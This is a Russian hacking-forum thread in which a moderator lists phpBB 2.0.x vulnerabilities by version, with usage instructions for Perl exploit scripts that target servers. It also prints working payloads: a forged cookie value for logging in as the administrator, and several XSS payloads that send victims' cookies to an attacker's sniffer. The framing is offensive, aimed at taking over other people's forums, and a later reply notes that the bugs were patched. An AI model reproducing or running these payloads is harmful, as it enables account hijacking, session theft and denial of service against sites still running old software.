Уязвимость Phpbb

Тема в разделе "Обзор уязвимостей phpBB", создана пользователем Kven, 4 мар 2018.

  1. Kven

    Kven Модератор
    Команда форума Модератор Участник

    Регистрация:
    11 янв 2018
    Сообщения:
    299
    Симпатии:
    60
    Рассмотрим каждую версию форума по порядку и проанализируем. Будем рассматривать с версии 2.0.4,
    phpBB <= 2.0.4
    Цель: просмотр содержимого файлов на сервере
    Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети.
    Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpBB <= 2.0.5
    Цель: просмотр hash'a пароля
    Описание: Выпущена в 2002. Также редкая версия.
    Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    При запуске $remote = shift || 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift || 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl"
    Video: -
    phpBB <= 2.0.6
    Цель: просмотр hash'a пароля
    Описание: Выпущена в 2002. Также редкая версия.
    Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Запускаем "perl exp.pl <server> <folder> <user_id> <search_id>"
    Где <server> - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), <folder> - папка где находится сам форум (например если у нас Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!, вместо <folder> пишем forum), <user_id> <search_id> - ID пользователя.
    Video: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpBB <= 2.0.8
    Цель: подмена ip
    Описание: так себе
    Описание уязвимости: позволяет подменить ip отправителя на произвольный
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpBB 2.0.10
    Пропустим версии с 7 по 9, т.к. в них присутствует те же уязвимости, что и в phpBB 2.0.10.
    Цель: (1) Выполение произвольных команд.
    Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии.
    Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]"
    Где [*URL] - урл сайта (например Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!)
    video: -
    Цель: (2) Попадание в админку обходя ограничения.
    Описание: -
    Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP.
    Exploit: В архиве с видео =)
    Video: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpBB <= 2.0.11
    Цель: Выполение произвольных команд
    Описание: Была выпущена так же в 2002.
    Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php - горе-кодеры плохо запатчили предыдущую багу - фильтрация ковычки обходится как %2527
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpBB <= 2.0.12
    Цель: Вход на форум аккаунтом администратора.
    Описание: -
    Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies),
    вместо
    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D
    X - наш ID ,
    а меняем на
    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
    2 - как уже говорилось выше, ID админа
    Exploit: "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"
    Video: -
    phpBB <= 2.0.13
    Цель: просмотр hash'a пароля, любого пользователя
    Описание: -
    Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Запускать "perl exp.pl <site> <dir> <id>"
    Где <site> URL сайта <dir> - директория <id> - нужный нам пользователь
    Video: -
    phpBB <= 2.0.15
    Цель: получение Имя,Логина, Пароля от БД.
    Описание: -
    Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! Запускать "perl exp.pl <server> <dir> <id> \r\n"
    Где <server> - ip сервера, <dir> - директория в которой находится форум <id> номер существующего топика.
    Video: -
    phpBB <= 2.0.16
    Цель: получение hash'a пароля пользователя
    Описание: -
    Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! или Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!), которая получить кукисы. Они высылаются на сниффер,
    логи которого можно посмотреть здесь Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!.
    Exploit:
    Code:
    [*color=#EFEFEF][*url]Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!`i=new/**/Image();i.src='Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!`style='font-size:0;][/url][/url]'[/color]
    Video: -
    phpBB <= 2.0.16
    Цель: 2.0.16 Installation Path Disclosure
    Описание: -
    Описание уязвимости: раскрытие данных
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Video: -
    phpBB <= 2.0.17
    Цель: выполнение произвольных команд на сервере(php-inj)
    Описание: -
    Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок! Запускать "perl exp.pl <URL> <cmd>"
    Где <URL> - ссылка до форума например Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!, <cmd> - нужная команда (о командах читаем тут Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!).
    Video: -
    phpbb <= 2.0.18
    Цель: получение сессии админа
    Описание: XSS в собщении
    Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
    Exploit:
    Code:
    <B C=">" onmouseover="alert(document.location='Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!)" X="<B "> H A L L O </B>
    Code:
    <B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!`style='font-size:0; X="<B ">'</B>
    PHP:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок![/url]
    phpBB <= 2.0.18
    Цель: получение hash'a пароля пользователя
    Описание: найдена WJ (White Jordan =)
    Описание уязвимости: В данной версии присутствует XSS.
    Exploit:
    Code:
    [UR*L]Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"&#40")
    Video: -
    phpBB <= 2.0.18
    Цель: подмена ника
    Описание: найдена Dgoing
    Описание уязвимости: подмена ника, обход бана
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    Video: -
    phpbb <= 2.0.19
    Цель: получение сессии админа
    Описание: XSS в собщении
    Описание уязвимости: требует включеных BB-тэгов или HTML на форуме
    Exploit:
    Code:
    <B C='>' onmouseover='alert(document.location="Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!"+document.cookie)' X='<B '> antichat.ru </B>
    PHP:
    Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок![/email]
    phpbb <= 2.0.19
    Цель: получение пароля админа
    Описание: phpBB Style Changer\Viewer MOD SQL injection Exploit
    Описание уязвимости: sql-inj уязвимость в index.php?s=[SQL] позволяет выполнить произвольный запрос в бд
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpbb = 2.0.19
    Цель: DoS форума
    Описание: -
    Описание уязвимости: Уязвимость позволяет забанить всех пользователей на форуме
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpbb <= 2.0.19
    Цель: DoS форума
    Описание: Neo Security Team (автор - HaCkZaTaN)
    Описание уязвимости: Сплоит регистрирует неограниченное количество ников или делает через поиск запросы, которые база не может воспринять. Сплойт бессилен там, где надо вводить код (визуальное подтверждение) при регистрации
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpbb <= 2.0.19
    Цель: получение пароля админа
    Описание: Уязвимость позволяет удаленному пользователю произвести брут-форс атаку.
    Описание уязвимости: Уязвимость существует из-за того, что функция "gen_rand_string()" генерирует угадываемые случайные номера. Удаленный пользователь может изменить пароль к целевой учетной записи с помощью функционала восстановления пароля путем отправки большого количества запросов для подбора Validation ID (не более 1000000 запросов). Для удачной эксплуатации уязвимости злоумышленнику необходимо знать e-mail целевой учетной записи.
    Exploit: Ссылки могут видеть только зарегистрированные пользователи. Зарегистрируйтесь или авторизуйтесь для просмотра ссылок!
    phpbb <= 2.0.20
    Цель: DoS форума
    Описание: банит все аккаунты
    Описание уязвимости: по умолчанию в форуме включен бан аккаунта при более 5 неудачных попыток входа
    Exploit: phpBB 2.0.20 Disable Admin or User Account
    Video: -
     
  2. Sp-rutracker

    Sp-rutracker Участник
    Участник

    Регистрация:
    25 июн 2018
    Сообщения:
    1
    Симпатии:
    0
    В версии 3.0 давно уже прикрыли данные уязвимости а в 2.0 пофиксили.